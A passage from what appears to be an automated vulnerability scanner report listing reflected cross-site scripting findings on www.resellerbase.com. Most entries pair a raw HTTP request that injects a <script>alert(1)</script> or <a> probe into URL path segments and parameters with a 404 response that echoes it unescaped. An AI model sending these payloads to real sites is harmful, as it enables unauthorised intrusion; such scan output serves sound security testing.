The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f797b<script>alert(1)</script>622295e4d43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-informationf797b<script>alert(1)</script>622295e4d43/ebooks/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-informationf797b<script>alert(1)</script>622295e4d43/ebooks/googlepr.php was not found on this server.</p>
...[SNIP]...

2.3972. http://www.resellerbase.com/resources-information/ebooks/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c256<script>alert(1)</script>2b3346b57e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks7c256<script>alert(1)</script>2b3346b57e2/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks7c256<script>alert(1)</script>2b3346b57e2/googlepr.php was not found on this server.</p>
...[SNIP]...

2.3973. http://www.resellerbase.com/resources-information/ebooks/googlepr.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6dd81<script>alert(1)</script>67f2f6692c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/googlepr.php6dd81<script>alert(1)</script>67f2f6692c5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/googlepr.php6dd81<script>alert(1)</script>67f2f6692c5 was not found on this server.</p>
...[SNIP]...

2.3974. http://www.resellerbase.com/resources-information/ebooks/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload b3039<a>a2eb870b8e was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/googlepr.php?link_id=11b3039<a>a2eb870b8e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:51:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/googlepr.php?link_id=11b3039<a>a2eb870b8e was not found on this server.</p>
...[SNIP]...

2.3975. http://www.resellerbase.com/resources-information/ebooks/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6a0e7<script>alert(1)</script>6007ae250e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/googlepr.php?6a0e7<script>alert(1)</script>6007ae250e6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/googlepr.php?6a0e7<script>alert(1)</script>6007ae250e6=1 was not found on this server.</p>
...[SNIP]...

2.3976. http://www.resellerbase.com/resources-information/ebooks/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 14820<script>alert(1)</script>6d9e3a0f068 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information14820<script>alert(1)</script>6d9e3a0f068/ebooks/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information14820<script>alert(1)</script>6d9e3a0f068/ebooks/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3977. http://www.resellerbase.com/resources-information/ebooks/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa56e<script>alert(1)</script>0fb3f7164a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooksfa56e<script>alert(1)</script>0fb3f7164a9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooksfa56e<script>alert(1)</script>0fb3f7164a9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3978. http://www.resellerbase.com/resources-information/ebooks/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 75598<script>alert(1)</script>67ba14c3c56 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/search.php75598<script>alert(1)</script>67ba14c3c56?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:53:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/search.php75598<script>alert(1)</script>67ba14c3c56?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3979. http://www.resellerbase.com/resources-information/ebooks/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 335d6<a>f63854bfcec was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/search.php?keyword=search...&Submit3=Search335d6<a>f63854bfcec&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/search.php?keyword=search...&Submit3=Search335d6<a>f63854bfcec&opt=2 was not found on this server.</p>
...[SNIP]...

2.3980. http://www.resellerbase.com/resources-information/ebooks/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 52bf7<a>1951eef40f7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/search.php?keyword=search...52bf7<a>1951eef40f7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/search.php?keyword=search...52bf7<a>1951eef40f7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3981. http://www.resellerbase.com/resources-information/ebooks/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dab3e<script>alert(1)</script>32785d59412 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/search.php?keyword=search...&Submit3=Search&opt=2&dab3e<script>alert(1)</script>32785d59412=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/search.php?keyword=search...&Submit3=Search&opt=2&dab3e<script>alert(1)</script>32785d59412=1 was not found on this server.</p>
...[SNIP]...

2.3982. http://www.resellerbase.com/resources-information/ebooks/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 23c88<a>e40e7e0f0ab was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /resources-information/ebooks/search.php?keyword=search...&Submit3=Search&opt=223c88<a>e40e7e0f0ab HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/resources-information/ebooks/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/search.php?keyword=search...&Submit3=Search&opt=223c88<a>e40e7e0f0ab was not found on this server.</p>
...[SNIP]...

2.3983. http://www.resellerbase.com/resources-information/ebooks/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2256c<script>alert(1)</script>98b3a1e535b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information2256c<script>alert(1)</script>98b3a1e535b/ebooks/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information2256c<script>alert(1)</script>98b3a1e535b/ebooks/themes/ was not found on this server.</p>
...[SNIP]...

2.3984. http://www.resellerbase.com/resources-information/ebooks/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1d2fe<script>alert(1)</script>9ce971f7683 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks1d2fe<script>alert(1)</script>9ce971f7683/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks1d2fe<script>alert(1)</script>9ce971f7683/themes/ was not found on this server.</p>
...[SNIP]...

2.3985. http://www.resellerbase.com/resources-information/ebooks/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5aa03<script>alert(1)</script>f7b77d55476 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes5aa03<script>alert(1)</script>f7b77d55476/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes5aa03<script>alert(1)</script>f7b77d55476/ was not found on this server.</p>
...[SNIP]...

2.3986. http://www.resellerbase.com/resources-information/ebooks/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 52f09<script>alert(1)</script>6a9e972a7aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes/?52f09<script>alert(1)</script>6a9e972a7aa=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooks/themes/?52f09<script>alert(1)</script>6a9e972a7aa=1 was not found on this server.</p>
...[SNIP]...

2.3987. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3dc2d<script>alert(1)</script>b4d18213563 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information3dc2d<script>alert(1)</script>b4d18213563/ebooks/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information3dc2d<script>alert(1)</script>b4d18213563/ebooks/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3988. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f566d<script>alert(1)</script>455d73759f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooksf566d<script>alert(1)</script>455d73759f5/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /resources-information/ebooksf566d<script>alert(1)</script>455d73759f5/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.3989. http://www.resellerbase.com/resources-information/ebooks/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/resources-information/ebooks/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 17bd1<script>alert(1)</script>4dea439c857 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources-information/ebooks/themes17bd1<script>alert(1)</script>4dea439c857/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
